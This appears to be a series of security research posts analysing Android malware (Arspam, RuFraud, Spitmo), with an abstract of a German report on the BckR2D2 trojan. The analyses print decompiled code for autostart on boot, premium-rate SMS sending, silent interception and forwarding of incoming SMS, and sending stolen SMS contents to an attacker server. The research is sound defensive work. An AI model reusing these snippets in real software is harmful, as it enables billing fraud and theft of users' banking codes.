New Technical Report – Analysis of BckR2D2

Our research group has published a new technical report with the analysis and comparison of several versions of BckR2D2. The report is available in German only and can be found under CS-2011-08 (opus).

Abstract:
Im Oktober 2011 erregte die Veröffentlichung von Details über die inzwischen meist als BckR2D2 bezeichnete Schadsoftware öffentliches Aufsehen. Mitglieder des Chaos Computer Club e.V. veröffentlichten einen ersten Bericht über die Funktionsweise des Trojaners, dem weitere Analysen folgten. In dieser Arbeit geben die Autoren einen Überblick über die bislang veröffentlichen Einzelberichte und über die verschiedenen Komponenten der Schadsoftware sowie deren Funktionsweise. Hierzu präsentiert diese Arbeit die wesentlichen Ergebnisse einer ausführlichen Analyse aller Komponenten des Trojaners und geht insbesondere auf Unterschiede zwischen den beiden bislang bekannten Varianten BckR2D2-I und II ein. Ein besonderes Augenmerk der Autoren gilt ebenfalls der Verifikation der zuvor, in besagten Berichten getroffenen Aussagen.

Detailed Analysis of Android.Arspam

Intro: What is Android.Arspam?

Android.Arspam is a new Android malware threat that emerged some days ago and uses a trojanised version of a Islamic compass application to distribute political propaganda links. This malware represent the first stage of politically-motivated hacking (hacktivism) on mobile platforms.

Analysis of the Application and Its Structure

The app requests the following permissions:

  • android.permission.INTERNET
  • android.permission.ACCESS_FINE_LOCATION
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.INTERNET
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.READ_CONTACTS
  • android.permission.CHANGE_WIFI_MULTICAST_STATE
  • android.permission.CLEAR_APP_USER_DATA
  • android.permission.BIND_INPUT_METHOD
  • android.permission.WRITE_CONTACTS
  • android.permission.CLEAR_APP_CACHE
  • android.permission.AUTHENTICATE_ACCOUNTS
  • android.permission.READ_PHONE_STATE
  • android.permission.SET_PREFERRED_APPLICATIONS
  • android.permission.INTERNAL_SYSTEM_WINDOW
  • android.permission.MANAGE_ACCOUNTS
  • android.permission.PERSISTENT_ACTIVITY
  • android.permission.FLASHLIGHT
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.ACCESS_MOCK_LOCATION
  • android.permission.SEND_SMS
  • android.permission.HARDWARE_TEST
  • android.permission.ACCESS_CHECKIN_PROPERTIES
  • android.permission.DISABLE_KEYGUARD
  • android.permission.READ_SYNC_STATS
  • android.permission.READ_INPUT_STATE
  • android.permission.EXPAND_STATUS_BAR
  • android.permission.BLUETOOTH
  • android.permission.BIND_APPWIDGET
  • android.permission.ACCESS_LOCATION_EXTRA_COMMANDS
  • android.permission.BROADCAST_SMS
  • android.permission.DIAGNOSTIC
  • android.permission.BLUETOOTH_ADMIN
  • android.permission.DEVICE_POWER
  • android.permission.CHANGE_CONFIGURATION
  • android.permission.DELETE_PACKAGES
  • android.permission.BROADCAST_WAP_PUSH
  • android.permission.REBOOT
  • android.permission.WRITE_SMS
  • android.permission.ACCESS_WIFI_STATE
  • android.permission.ACCESS_COARSE_LOCATION
  • android.permission.STATUS_BAR
  • android.permission.MOUNT_UNMOUNT_FILESYSTEMS
  • android.permission.GLOBAL_SEARCH
  • android.permission.READ_SMS
  • android.permission.CONTROL_LOCATION_UPDATES
  • android.permission.MANAGE_APP_TOKENS
  • android.permission.DELETE_CACHE_FILES
  • android.permission.BATTERY_STATS
  • android.permission.READ_SYNC_SETTINGS
  • android.permission.SET_TIME_ZONE
  • com.android.browser.permission.READ_HISTORY_BOOKMARKS
  • android.permission.MOUNT_FORMAT_FILESYSTEMS
  • android.permission.SIGNAL_PERSISTENT_PROCESSES
  • android.permission.MASTER_CLEAR
  • android.permission.READ_LOGS
  • android.permission.BRICK
  • android.permission.SET_ACTIVITY_WATCHER
  • android.permission.RECEIVE_SMS
  • android.permission.GET_ACCOUNTS
  • android.permission.CALL_PHONE
  • android.permission.READ_CONTACTS
  • android.permission.RESTART_PACKAGES
  • android.permission.READ_CALENDAR
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.CAMERA
  • android.permission.ACCESS_FINE_LOCATION
  • android.permission.SUBSCRIBED_FEEDS_READ
  • android.permission.WAKE_LOCK
  • android.permission.RECORD_AUDIO
  • android.permission.INSTALL_PACKAGES
  • android.permission.INJECT_EVENTS
  • android.permission.RECEIVE_WAP_PUSH
  • android.permission.USE_CREDENTIALS
  • android.permission.ACCOUNT_MANAGER
  • android.permission.SET_ALWAYS_FINISH
  • android.permission.RECEIVE_MMS
  • android.permission.WRITE_SECURE_SETTINGS
  • android.permission.MODIFY_AUDIO_SETTINGS
  • android.permission.WRITE_CALENDAR
  • android.permission.WRITE_SYNC_SETTINGS
  • android.permission.INSTALL_LOCATION_PROVIDER
  • android.permission.SYSTEM_ALERT_WINDOW
  • android.permission.MODIFY_PHONE_STATE
  • android.permission.WRITE_SETTINGS
  • android.permission.INTERNET
  • android.permission.ACCESS_SURFACE_FLINGER
  • android.permission.CHANGE_NETWORK_STATE
  • android.permission.CALL_PRIVILEGED
  • android.permission.CHANGE_COMPONENT_ENABLED_STATE
  • android.permission.DUMP
  • android.permission.SET_WALLPAPER
  • android.permission.GET_TASKS
  • android.permission.WRITE_EXTERNAL_STORAGE
  • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission.WRITE_OWNER_DATA
  • android.permission.WRITE_GSERVICES
  • android.permission.SET_WALLPAPER_HINTS
  • android.permission.BROADCAST_STICKY
  • android.permission.READ_FRAME_BUFFER
  • android.permission.GET_PACKAGE_SIZE
  • android.permission.FORCE_BACK
  • android.permission.UPDATE_DEVICE_STATS
  • android.permission.WRITE_APN_SETTINGS
  • android.permission.BROADCAST_PACKAGE_REMOVED
  • android.permission.SET_ANIMATION_SCALE
  • android.permission.SET_ORIENTATION
  • android.permission.SET_DEBUG_APP
  • android.permission.FACTORY_TEST
  • android.permission.REORDER_TASKS
  • android.permission.SET_PROCESS_LIMIT
  • android.permission.READ_OWNER_DATA
  • android.permission.CHANGE_WIFI_STATE
  • android.permission.VIBRATE
  • android.permission.SUBSCRIBED_FEEDS_WRITE
  • android.permission.RECEIVE_BOOT_COMPLETED

When the app has been installed successfully, the icon of the original app shows up in the dashboard. The UI and functionality have also been duplicated from the original app.

The malicious part of this application consists of the following two main classes which will be analyzed in detail afterwards:

  • arRabi
  • alArabiyyah

Analysis of arRabi

This class checks if the boot-process of the smartphone has completed and starts the malicious alArabiyyah service afterwards:

if ("android.intent.action.BOOT_COMPLETED".equals(paramIntent.getAction()){
   paramContext.startService(new Intent(paramContext, alArabiyyah.class));
}

Analysis of alArabiyyah

This application starts a service called alArabiyyah, which sends an SMS to every contact in the address book with a link to one of the following 18 forum sites in the message:

  • http://www.dhofaralaezz.com/vb/showthread.php?t=4453
  • http://www.i7sastok.com/vb/showthread.php?t=6930
  • http://www.dmahgareb.com/vb/showthread.php?p=6606
  • http://mafia.clubme.net/t2139-topic
  • http://www.4pal.net/vb/showthread.php?t=40752
  • http://www.howwari.com/vb/showthread.php?t=28495
  • http://forum.te3p.com/464619.html
  • http://www.htoof.com/vb/t187394.html
  • http://vb.roooo3.com/showthread.php?t=174074
  • http://www.alsa7ab.com/vb/showthread.php?t=4746
  • http://www.riyadhmoon.com/vb/showthread.php?p=4548287
  • http://forum.althuibi.com/showthread.php?p=137646
  • http://www.2wx2.com/vb/showthread.php?p=43548
  • http://www.mdmak.com/vb/showpost.php?p=500795&postcount=1
  • http://www.too-8.com/vb/showthread.php?s=&threadid=7058
  • http://www.3z1z.com/vb/showthread.php?t=2910
  • http://www.w32w.com/vb/showpost.php?p=506831&postcount=1
  • http://forum.65man.com/65man33611.html

Additionally, if the inserted SIM is from Bahrain, the application attempts to download a PDF file of the Bahrain Independent Commission of Inquiry (see the following code-snipet).

if (((TelephonyManager)getSystemService("phone")).getSimCountryIso() == "BH"){
   URL localURL = new URL("http://www.alwasatnews.com/data/2011/3382/BICIreportAR.pdf");
   HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
   localHttpURLConnection.setRequestMethod("GET");
   localHttpURLConnection.setDoOutput(true);
   localHttpURLConnection.connect();
   File localFile1 = Environment.getExternalStorageDirectory();
   File localFile2 = new File(localFile1, "BICIreportAR.pdf");
   localFileOutputStream = new FileOutputStream(localFile2);
   localFile2.toString();
   localInputStream = localHttpURLConnection.getInputStream();
   localHttpURLConnection.getContentLength();
   arrayOfByte = new byte[1024];
}

Sample Information:

sha256:
1d22924bbe5dce7696e18d880482b63ce19ca0746f8671aaec865cce143f6e6f

md5:
e7584031896cb9485d487c355ba5e545

Mobile-Sandbox Report

Detailed Analysis of Android.RuFraud

Intro: What is Android.RuFraud?

SuiConFo.apk is an application which sends premium rated SMS messages. This is the first malicious app of this kind which was specially build for European countries (Germany, Luxembourgs, France, Belgium, Switzerland, Spain and Great Britain) and Canada but not for the Chinese market. In the last few days many similar apps showed up in the official Google market which had been summed up under RuFraud.

Analysis of the Application and Its Structure

The app requests the following permissions, although if it is using only very few of them:

  • android.permission.SEND_SMS
  • android.permission.INSTALL_PACKAGES
  • android.permission.USE_CREDENTIALS
  • android.permission.BLUETOOTH_ADMIN
  • android.permission.INTERNET
  • android.permission.DEVICE_POWER
  • android.permission.READ_CONTACTS
  • android.permission.RECEIVE_SMS
  • android.permission.ACCESS_GPS
  • android.permission.ACCESS_LOCATION

It consists of the following two main classes which will be analyzed in detail afterwards:

  • MagicSMSActivity
  • SMSReceiver

When the app has been installed successfully, the standard icon shows up in the dashboard (see left part of the picture). After opening the application, a pop-up message is displayed, including the following text: “ERROR: Android version is not compatible” (see right part of the picture). For the user it seems, that this app isn’t working on his/her smartphone. In reality, the app sends four premium-rated SMS messages in the background.

Analysis of MagicSMSActivity

This class is responsible for sending the paid SMS messages to predefined numbers. As you can see in the following code snippet, the app tries to get the Country-ID from the SIM:

String str1 = ((TelephonyManager)getSystemService("phone")).getSimCountryIso();

Afterwards it checks if this Country-ID is included in its list of services:

if (str1.equals("ch")){
        str2 = "543";
        str3 = "GEHEN SP 300";
        continue;
}
if (str1.equals("lu")){
        str2 = "64747";
        str3 = "ACCESS SP";
        continue;
}
if (str1.equals("de")){
        str2 = "63000";
        str3 = "SP 462";
        continue;
}

Afterwards the malicious application sends four SMS messages to the phone number specified in str2 with the message stored at str3:

localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);
localSmsManager.sendTextMessage(str2, null, str3, null, null);

For Germany, these SMS will be sent to the Net Mobile AG which is well known for premium-rated SMS services. The price for one SMS ranges between 0,29€ and 1,99€.

Analysis of SMSReceiver

This class implements an Android.Receiver which is able to receive incoming SMS messages before the build-in SMS application receives them.

In this case the app is checking if the message comes from one of the stored numbers (the list of numbers is identical to the numbers, the app sends messages to). If this is the case, the message gets forwarded to a specified number (0646112264) and the broadcast of this message is aborted so that the build-in application (as well as the user) do not notice this message. This can be seen in the following code snippet:

String str1 = arrayOfSmsMessage[0].getMessageBody();
str2 = arrayOfSmsMessage[0].getDisplayOriginatingAddress();
if ((!str2.equals("81001")) && (!str2.equals("35064")) && (!str2.equals("63000")) && (!str2.equals("9903")) && (!str2.equals("60999")) && (!str2.equals("543")) && (!str2.equals("64747")))
abortBroadcast();
SmsManager.getDefault().sendTextMessage("0646112264", null, str1, null, null);

Sample Information:

sha256:
98a402d885cdb941dca8b45a4bbcbbe7f44ba62910d519bc1c2161dba117ebd2

md5:
1a3fb120e5a4bd51cb999a43e2d06d88

Mobile-Sandbox Report

Detailed Analysis of Android.Spitmo

Intro: What is Android.Spitmo?

Android.Spitmo is the mobile “add-on” for SpyEye. Infected with this combination of malware, the attacker is able to modify banking orders made by the victim, even if they are secured by mTan.

Step 1: Forcing the User to Install the App

If the machine of a user is compromised with SpyEye and the user tries to browse to his bank website a message is shown presenting a new security solution which is now obligatory in order to use the online banking service in the future. The new solution pretends to be an Android application that protects the phone’s SMS messages from being intercepted by a Trojan installed on the smartphone. The user is then directed to a download page.

After the user has downloaded and installed the app on his Android smartphone, nothing seems to happen at a first glance. There is no new icon on the dashboard, no new running service or running application as you can see in the following screenshot.

After a bit of search, the user is able to find an application called “System” (the malware application). If taking a look at it, you can see that the app has the permissions to access your SMS messages, intercept phone calls and communicate over the Internet:

To complete the installation, the user has to call the number “325000”. The call is intercepted by the malware and an activation code is presented on the home screen to be submitted to the bank’s website afterwards:

The de-compiled code of this action can be seen here:

if (intent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL") && intent.getStringExtra("android.intent.extra.PHONE_NUMBER").equals("325000"))
{
    Toast.makeText(context1, "251340", 0).show();
    set ResultData(null);
}

Step 2: The Trojan Action

After the Trojan has been installed successfully, all incoming SMS messages will be intercepted and send to the attacker’s server.

The de-compiled code below creates a string (?sender=[SenderAddress]&receiver=[ReciverAddress]&text=[Message]”) and is called every time a SMS message is received:

String s3 = (String) ((Iterator) (obj)).next();
Boolean boo1;
String s4 = String.valueOf(s3);
StringBuilder stringbuilder = (new StringBuilder(s4)).append("?sender=");
String s5 = URLEncoder.encode(as[0]);
StringBuilder stringbuilder1 = (new StringBuilder(s5)).append("&receiver=");
String s6 = URLEncoder.encode(as[1]);
StringBuilder stringbuilder2 = (new StringBuilder(s5)).append("&text=");
String s7 = URLEncoder.encode(as[2]);
String s8 = stringbuilder2.append(s7).toString();
java.io.InputStream inputstream = (new URL(s8)).openConnection().getInputStream();
InputStreamReader inputstreamreader = new InputStreamReader(inputstream);
BufferedReader bufferedreader = new BufferedReader(inputstreamreader);
String s9 = bufferedreader.readLine();
bufferedreader.close();
bool1 = Boolean.valueOf(true);
obj = bool1;

As implied from the structure of this string, it will be appended to a HTTP request, to be sent to the attacker’s website afterwards. The application package consists of another file called “settings.xml” inside the “asset” directory, which contains the configuration data (as can be seen in the following code snippet):

...








...

As far as we know, there are 3 cases for “send value” (1 = HTTP; 2 = SMS & HTTP; any other = SMS). The phone number, the SMS messages get forwarded to, is stored in “telephone value”.

Step 3: The Attacker’s Website

The attacker’s website consist of the following 4 files and a mySQL database:

  • config.php (configuration for mySQL access)
  • gate.php (receives the HTTP requests from the malware and populates the database)
  • json.php (responsible for DB queries)
  • index.html (displays the database entries)

Sample Information:

sha256:
ba1aa326ca5b79e79feba9bbfe85f238b63c317d9329f1f7c28d54fe905353b9

md5:
cfa9edb8c9648ae2757a85e6066f6515

Mobile-Sandbox Report